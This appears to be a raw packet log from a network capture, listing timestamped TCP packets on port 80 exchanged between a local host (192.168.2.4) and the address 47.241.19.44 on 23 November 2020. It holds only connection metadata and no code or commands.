                                                                                                                                            Nov 23, 2020 12:19:15.421871901 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465428114 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465487003 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465518951 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465528965 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465567112 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465569019 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465575933 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465615988 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465621948 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465656996 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465665102 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465693951 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465708971 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465733051 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465745926 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465770960 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.465785027 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.465821028 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.502899885 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.502958059 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.502996922 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503026009 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.503036022 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503073931 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503093958 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.503112078 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503159046 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503173113 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.503211975 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.503248930 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.503320932 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.536053896 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.536221981 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651381016 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651438951 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651488066 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651494980 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651516914 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651544094 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651565075 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651592016 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651645899 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651650906 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651655912 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651698112 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.651711941 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.651771069 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.688656092 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.688694954 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.688711882 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.688837051 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.693852901 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.693897009 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.693928003 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.693958044 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.693988085 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.694009066 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694020987 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.694040060 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694046021 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694051027 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694051981 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.694071054 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694082975 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.694128990 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.694145918 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.732564926 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.732667923 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842371941 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842431068 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842468023 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842479944 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842502117 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842521906 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842530966 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842560053 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842572927 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842597961 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842609882 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842636108 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842647076 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842673063 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842684984 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842713118 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842724085 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842751980 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.842763901 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.842832088 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884078979 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884124041 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884157896 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884171963 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884186983 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884212971 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884227037 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884242058 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884268999 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884272099 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884290934 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884299040 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884325981 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.884329081 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884346008 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.884388924 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:15.918545961 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.918669939 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.033626080 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033698082 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033727884 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033767939 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033804893 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033852100 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033895016 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033931971 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.033973932 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.036438942 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.074737072 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074798107 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074831963 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074862957 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074902058 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074939013 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.074985981 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.075012922 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.075030088 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.075047016 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.075052023 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.075067997 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.075104952 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.075124979 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.075139999 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.075143099 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.075421095 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.109503984 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.111573935 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.118606091 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.123575926 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.151024103 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.152967930 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.224450111 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224513054 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224543095 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224574089 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224616051 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224663019 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.224663019 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.224690914 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.224703074 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.224867105 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265461922 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265518904 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265562057 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265574932 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265619040 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265656948 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265660048 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265693903 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265703917 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265744925 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265747070 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265784025 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265784979 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265820026 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265821934 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265860081 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265897036 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265909910 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.265934944 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265971899 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.265974045 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.266020060 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.266057014 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.266740084 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.300812006 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.301342964 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.350955009 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.354290962 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.378520966 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.381511927 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.415514946 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.415572882 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.415620089 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.415662050 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.415664911 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.415695906 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.415699959 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.415739059 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.415740013 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.417087078 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.420032978 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.420377970 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456094027 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456154108 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456193924 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456218958 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456232071 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456267118 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456269979 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456305027 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456309080 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456373930 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456408024 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456417084 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456454992 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456490040 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456494093 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456532001 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.456566095 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.456579924 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.457321882 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.491658926 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.494122028 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.498697042 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.498733044 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.501399994 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.532618999 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.533833027 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.606395006 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606462955 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606502056 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606542110 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606580973 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606594086 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.606618881 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.606621981 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.606657982 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.606808901 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.621308088 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.623775959 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.646958113 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647018909 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647057056 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647094965 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647109032 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647133112 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647170067 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647176027 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647208929 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647211075 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647245884 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647245884 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647294044 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647332907 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647340059 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647377968 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647416115 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647418976 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647454977 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647491932 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647492886 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.647531986 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.647574902 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.648332119 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.649391890 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.689619064 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.689683914 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.690674067 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.723316908 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.727720976 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.796822071 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.796850920 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.796865940 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.796883106 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.796897888 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.796927929 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.797300100 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.801211119 CET4973880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:16.872996092 CET4973780192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:17.067977905 CET804973847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:17.187213898 CET804973747.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:17.668709993 CET804973747.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:17.668880939 CET4973780192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:17.672566891 CET4973780192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:17.942945004 CET804973747.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:18.842664957 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:18.842664957 CET4974380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:19.108309984 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:19.109627008 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:19.114414930 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:19.129268885 CET804974347.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:19.129411936 CET4974380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:19.420500040 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:20.069576025 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:20.069654942 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:20.069686890 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:20.069889069 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:20.069948912 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:20.074027061 CET4974480192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:20.339705944 CET804974447.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:21.113640070 CET4974380192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:19:59.795234919 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.068722010 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.068965912 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.069071054 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.385927916 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.715794086 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.715840101 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.715887070 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.715995073 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716001987 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.716034889 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716072083 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716110945 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716120958 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.716156006 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.716208935 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716249943 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716286898 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.716291904 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.716373920 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.989725113 CET804976547.241.19.44192.168.2.4
